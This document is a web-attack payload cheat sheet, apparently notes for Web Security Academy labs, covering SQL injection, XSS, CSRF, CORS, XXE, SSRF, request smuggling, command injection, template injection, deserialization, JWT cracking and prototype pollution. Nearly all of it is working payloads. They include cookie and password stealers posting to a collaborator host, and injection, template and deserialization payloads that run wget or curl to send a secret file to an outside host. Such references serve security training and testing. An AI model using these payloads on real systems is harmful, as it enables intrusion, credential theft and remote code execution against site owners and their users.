Payloads
SQLi
UNION SQLi
#clause bypass
'+OR+1=1--
#login bypass
administrator'--
#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--
#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#
#Tables names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
#Tables names Oracle
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Blind SQLi
#Conditional response
TrackingId=xyz' AND '1'='1
TrackingId=xyz' AND '1'='2
#Table exist
TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
#User exist
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
#Password length
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
#Password guess
TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a
Blind error based SQLi
TrackingId=xyz'||(SELECT '')||'
TrackingId=xyz'||(SELECT '' FROM dual)||
TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
Visible Error
TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--
TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
Blind Time-based
TrackingId=x'||pg_sleep(10)--
select 1 from pg_sleep(5)
;(select 1 from pg_sleep(5))
||(select 1 from pg_sleep(5))
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
Out of Band Interactions
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
SQLI inside XML
<storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>
XSS
DOM-based XSS
#document.write sink
product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
#document.write sink
"><svg onload=alert(1)>
#innerHTML sink
<img src=1 onerror=alert(1)>
#jQuery href sink
javascript:alert(document.cookie)
#jQuery selector sink
<iframe src="https://lab.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
#angular ng-app
{{$on.constructor('alert(1)')()}}
1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
#json sink
\"-alert(1)}//
#bypass angle brackets replace
<><img src=1 onerror=alert(1)>
#open redirection
https://lab.web-security-academy.net/post?postId=4&url=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/
#cookie manipulation
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">
#WAF bypass
"-alert(window["document"]["cookie"])-"
"-window["alert"](window["document"]["cookie"])-"
"-self["alert"](self["document"]["cookie"])-"
Using the eval() method evaluates or executes an argument.
Using atob() or btoa() is function used for encoding to and from base64 format strings.
If eval() being blocked then Alternatives:
setTimeout("code")
setInterval("code)
setImmediate("code")
Function("code")()
XSS web messages
<iframe src="https://lab.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
#JSON.parse() sink of web msg
<iframe src=https://YOUR-LAB-ID.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>
Reflected
#js string with angle brackets
'-alert(1)-'
blez';alert(1);let myvar='test
#tag attribute with angle brackets <>
test" onmouseover="alert(1)
#blocked tags and attrs
<iframe src="https://lab.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
#custom tags
<script>
location = 'https://lab.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
#svg tag allowed
https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
#single quote and backslash escape
</script><script>alert(1)</script>
#js with angle brackets, double quotes and single quotes escaped
\'-alert(1)//
#all quotes backslash but backticks js literal
${alert(1)}
\'-alert(1)//
fuzzer\';console.log(12345);//
fuzzer\';alert(`Testing The backtick a typographical mark used mainly in computing`);//
Stored
#href with double quotes
javascript:alert(1)
http://foo?'-alert(1)-'
#replacing angle brackets bypass
<><img src=1 onerror=alert(1)>
XSS stealers
#cookie stealer
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
#password stealer
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
XSS to CSRF
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
CSRF
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="blez@b.b">
</form>
<script>
document.forms[0].submit();
</script>
#Method changed to GET
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="blez@b.b">
</form>
<script>
document.forms[0].submit();
</script>
#token tied to non-session cookie
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="blez@b.b">
</form>
<script>
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None" onerror="document.forms[0].submit()">
</script>
#token duplicated in cookie
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
#SameSite Lax Bypass by method override
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST";
</script>
#SameSite Strict Bypass via redirect
<script>
document.location = "https://YOUR-LAB-ID.web-security-academy.net/post/comment/confirmation?postId=1/../../my-account/change-email?email=pwned%40web-security-academy.net%26submit=1";
</script>
#SameSite Lax bypass by cookie refresh
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="pwned@portswigger.net">
</form>
<p>Click anywhere on the page</p>
<script>
window.onclick = () => {
window.open('https://YOUR-LAB-ID.web-security-academy.net/social-login');
setTimeout(changeEmail, 5000);
}
function changeEmail() {
document.forms[0].submit();
}
</script>
#bypass refere validation with header on exploit server
<meta name="referrer" content="no-referrer">
#Bypass refere validation broken
Referrer-Policy: unsafe-url
history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net")
CSWSH - Cross-Site WebSocket Hijacking
#script to start a websocket chat
<script>
var ws = new WebSocket('wss://YOUR-LAB-ID.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://YOUR-COLLABORATOR-PAYLOAD.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
<script>
document.location = "https://cms-YOUR-LAB-ID.web-security-academy.net/login?username=YOUR-URL-ENCODED-CSWSH-SCRIPT&password=anything";
</script>
CORS
#Access-Control-Allow-Credentials reflect Origin
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
#cors with null origin, use of an iframe sandbox as this generates a null origin request
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
#reflected subdomain with XSS in productID
<script>
document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
XXE
#get file with external entities
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<productID>&xxe;</productID>
#ssrf atack to public adress
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<productID>&xxe;</productID>
Blind XXE
#out of band blind xxe
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
<productID>&xxe;</productID>
#out of band parameter entities
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
External DTD XXE
#malicious DTD out of band exfiltration
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
#Error based
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
XInclude injection
<productID>
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
</productID>
XXE image upload
#create local svg with whit content
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
SSRF
#try to change api to localhost
http://localhost/admin
#try call api on ip
http://192.168.0.1:6566/admin
http://127.0.0.1/admin
http://127.1/admin
#obfuscation of 'a'
http://127.1/%2561dmin
#open redirection ssrf
/product/nextProduct?path=http://192.168.0.12:6566/admin
Request Smuggling
CL.TE
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
X-Ignore: X
-------------------------------------------------------------------------------------
#Bypass front-end control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
-------------------------------------------------------------------------------------
#The front-end server adds an HTTP header to incoming requests containing their IP address
#host rewriting
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-abcdef-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Connection: close
x=1
-------------------------------------------------------------------------------------
#Steal user cookie
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=your-session-token
csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test
-------------------------------------------------------------------------------------
#smuggling request with xss inside the header
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked
0
GET /post?postId=5 HTTP/1.1
User-Agent: a"/><script>document.location='http://OASTIFY.COM/?cookiestealer='+document.cookie;</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
TE.CL
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
-------------------------------------------------------------------------------------
#Bypass frontend control
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
H2.CL
Send the request a few times and confirm that you receive a redirect to the exploit server.
Resend the request and wait for 10 seconds or so.
Go to the exploit server and check the access log. If you see a
GET /resources/
request from the victim, this indicates that your request smuggling attack was successful
POST / HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Content-Length: 0
GET /resources HTTP/1.1
Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Content-Length: 5
x=1
H2.TE
Send the request to poison the response queue. You will receive the 404 response to your own request.
Wait for around 5 seconds, then send the request again to fetch an arbitrary response.
Repeat this process until you capture a 302 response containing the admin's new post-login session cookie.
Copy the session cookie and use it to send the following request:
GET /admin HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=STOLEN-SESSION-COOKIE
POST /x HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
H2 CRLF Injeciton
Note: enable the Allow HTTP/2 ALPN override option and change the body of HTTP/2 request to below POST request.
0
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=HACKER-SESSION-COOKIE
Content-Length: 800
search=nutty
H2.TE desync v10a h2path
POST /x HTTP/2
Host: TARGET.net
Transfer-Encoding: chunked
0
GET /x HTTP/1.1
Host: TARGET.web-security-academy.net\r\n
\r\n
CL.0
Using the drop-down menu next to the Send button, change the send mode to Send group in sequence (single connection).
POST /resources/images/blog.svg HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Length: CORRECT
GET /admin HTTP/1.1
Foo: x
OS cmd injection
storeID=1|whoami
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||
#path traversal allowed
||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||
SSTI
#those will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,
}}{{7*7}}
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}
#ERB
<%= system("cat+/home/carlos/secret") %>
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("cat+/home/carlos/secret")+%25>
#Tornado
POST /my-account/change-blog-post-author-display HTTP/2
Host: TARGET.net
Cookie: session=fenXl1hfjQBgGkrcmJoK7D8RU3eHkkCd
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')
#Freemaker
${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
#Handlebars, url encoded as url param
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
Path Traversal
/home/carlos/secret
....//....//....//....//home//carlos//secret
..%252f..%252f..%252fhome/carlos/secret
/var/www/images/../../../home/carlos/secret
../../../home/carlos/secret%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fhome%252fcarlos%252fsecret
/etc/passwd
....//....//....//....//etc//passwd
..%252f..%252f..%252fetc/passwd
/var/www/images/../../../etc/passwd
../../../etc/passwd%00.png
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
Authentication
Web Sockets
<script>
var ws = new WebSocket('wss://your-websocket-url');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
oAuth
#open redirection oauth steal token
<script>
if (!document.location.hash) {
window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
} else {
window.location = '/?'+document.location.hash.substr(1)
}
</script>
Deserialization
#JAVA
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections3 'wget http:// --post-file=/home/carlos/secret' | base64 -w 0
java -jar /opt/ysoserial/ysoserial.jar CommonsCollections4 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0
#PHP
#path to find a secret
/cgi-bin/phpinfo.php
#command creation
/opt/phpggc/phpggc Symfony/RCE4 exec 'wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret' | base64 -w 0
#payload creation
<?php
$object = "";
$secretKey = "q9ekwze228qxcdd9uvfjxxkfsipzq9ul";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
#RUBY script -
# Autoload the required classes
Gem::SpecFetcher
Gem::Installer
# prevent the payload from running when we Marshal.dump it
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "wget http://5v1foaz3jyqn51jftzizmb5rtiz9nzbo.oastify.com --post-file=/home/carlos/secret")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)
JWT
https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list
#crack JWT secret
hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list
Prototype pollution
#bypass sanitization
/?__pro__proto__to__[foo]=bar
/?__pro__proto__to__.foo=bar
/?constconstructorructor[protoprototypetype][foo]=bar
/?constconstructorructor.protoprototypetype.foo=bar
<script>
location="https://YOUR-LAB-ID.web-security-academy.net/#__proto__[hitCallback]=alert%28document.cookie%29"
</script>
"__proto__": {
"isAdmin":true
}
#server side prototype pollution
"constructor": {
"prototype": {
"isAdmin":true
}
}
"__proto__": {
"execArgv":[
"--eval=require('child_process').execSync('cat /home/carlos/secret')"
]
}
Last updated